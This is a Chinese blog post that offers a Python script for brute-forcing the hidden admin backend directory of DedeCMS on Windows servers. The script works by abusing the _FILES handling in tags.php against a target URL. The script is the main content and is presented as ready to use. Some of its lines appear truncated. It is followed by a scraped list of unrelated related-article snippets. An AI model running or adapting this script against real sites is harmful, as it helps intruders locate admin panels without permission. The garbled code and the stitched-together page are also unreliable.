织梦服务器系统win10,WIN服务器爆破DEDECMS后台目录
利用脚本python:
#!/usr/bin/env python
'''/*
* author = Mochazz
* team = 红日安全团队
* env = pyton3
*
*/
'''
import requests
import itertools
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
url = "http://192.168.1.9/tags.php"
data = {
"_FILES[mochazz][tmp_name]" : "./{p}<
"_FILES[mochazz][name]" : 0,
"_FILES[mochazz][size]" : 0,
"_FILES[mochazz][type]" : "image/gif"
}
for num in range(1,7):
if flag:
break
for pre in itertools.permutations(characters,num):
pre = ''.join(list(pre))
data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
print("testing",pre)
r = requests.post(url,data=data)
if "Upload filetype not allow !" not in r.text and r.status_code == 200:
flag = 1
back_dir = pre
data["_FILES[mochazz][tmp_name]"] = "./{p}<
break
else:
data["_FILES[mochazz][tmp_name]"] = "./{p}<
print("[+] 前缀为:",back_dir)
flag = 0
for i in range(30):
if flag:
break
for ch in characters:
if ch == characters[-1]:
flag = 1
break
data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)
r = requests.post(url, data=data)
if "Upload filetype not allow !" not in r.text and r.status_code == 200:
back_dir += ch
print("[+] ",back_dir)
data["_FILES[mochazz][tmp_name]"] = "./{p}<
break
else:
data["_FILES[mochazz][tmp_name]"] = "./{p}<
print("后台地址为:",back_dir)
演示结果:
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/6591.html
织梦服务器系统win10,WIN服务器爆破DEDECMS后台目录相关推荐
- 织梦php重新安装教程,织梦CMS系统后台重装的操作教程
原标题:织梦CMS系统后台重装的操作教程 网站在线运行,不可能一点问题都不存在,或者当初的网站设计.架构.功能已经不能满足现在用户的需求,所以我们会对网站做出相应的改动.网站除了前端的改版,还会有后台 ...
- 织梦网站如何上传服务器还原,织梦系统DedeCMS网站通过数据库备份、还原实现网站整站搬家移植...
用织梦系统(DedeCMS)制作的网站,当我们需要更换空间或把本地网站搬到服务器上时,需要用到织梦系统(DedeCMS)整站搬家移植的方法,通常网站有很多这样的教程,但是很多种方法都是无效的.今天就来 ...
- 织梦网站如何上传服务器还原,网站转移教程:织梦系统数据库备份和还原的方法步骤...
网站在运行的过程中,难免会遇到各种问题,比如:网站被攻击导致数据丢失,网站需要更换空间或服务器等等.所以,如何完完整整的把网站数据进行备份和还原,并转移到新的空间上,已是作为一个站长必须掌握的技能之一 ...
- 织梦同步静态文件到服务器,静态网站添加到织梦
静态网站添加到织梦 内容精选 换一换 本文介绍了弹性文件服务SFS各特性版本的功能发布和对应的文档动态,新特性将在各个区域(Region)陆续发布,欢迎体验. 开启网页防篡改时,您需为指定的主机分配一 ...
- 织梦同步静态文件到服务器,某猫织梦插件-织梦dedecms静态文件生成速度的区块插件...
经常使用织梦的朋友都可能都知道织梦cms 的静态生成速度有时候让人无法忍受:如果是企业展的几百篇的文章,那当然绰绰有余,但是一般数据量打起来生成速度也会大幅的降低,与同类的其他cms比如说帝国cms, ...
- 【建站篇】如何将本地搭建的织梦站点上传到服务器空间?
之前写过<dedeCMS+PHPStudy帮助新手实现在本地搭建织梦网站>的教程,主要讲解如何在自己电脑的本地环境中搭建织梦网站,特点是完全免费.易操作.易修改,因此比较适合初学者学习网站 ...
- win10系统如何在地图定位服务器地址,win10地图服务器地址
win10地图服务器地址 内容精选 换一换 新增接入,也称接入备案,指主体和域名已在其他接入商备案过,现需将顶级域名或其子域名解析在华为云,应申请新增接入备案,即变更或增加接入商.新增接入不会影响您在 ...
- win10系统配置服务器地址,win10系统配置服务器地址
win10系统配置服务器地址 内容精选 换一换 安装完操作系统后,需在当前iBMC远程管理界面中配置网卡IP地址才能远程连接服务器,配置方法如下.vi /etc/sysconfig/network-s ...
- win10修改服务器地址,win10 修改服务器地址
win10 修改服务器地址 内容精选 换一换 通过华为云创建的ECS服务器默认使用华为云提供的内网DNS进行解析.内网DNS不影响ECS服务器对公网域名的访问.同时,还可以不经Internet,直接通 ...
最新文章
- HDU 1254 推箱子 BFS
- 课时 12:可观测性-监控与日志(莫源)
- 抽象工厂模式(C#)
- openresty获取nginx body内容体
- 当Swin Transformer遇上DCN,清华可变形注意力Transformer模型优于多数ViT
- python读json文件中不同的数据类型_怎么使用python提取json文件中的字段
- 三、Linux 开机、重启和用户登录注销
- 浪擎全融合灾备云获大数据安全领域最佳创新奖
- Maven : mvn dependency:copy-dependencies
- WebStorm学习笔记003---前端脚手架
- 判断socket断开
- AI笔记: 数学基础之贝叶斯公式(概率公式)
- AR路由器ETH端口使用方法
- C++17新属性详解
- [每日一雷] C++多线程unique_lock condition_varibale mutex 动态释放内存泄露问题delete出现corrupted unsorted chunks
- oracle修改表的owner,Oracle中改变表的Owner和tablespace
- 领导周末喊程序员修bug,程序员霸气回应:在下卖艺不是卖身!
- (仿古工艺品)床榻与苏29飞机装配图
- java c语言与人工智能_C语言与LISP语言的区别
- 北京摇号系统服务器,支付宝“城市服务”平台可查询北京小客车摇号结果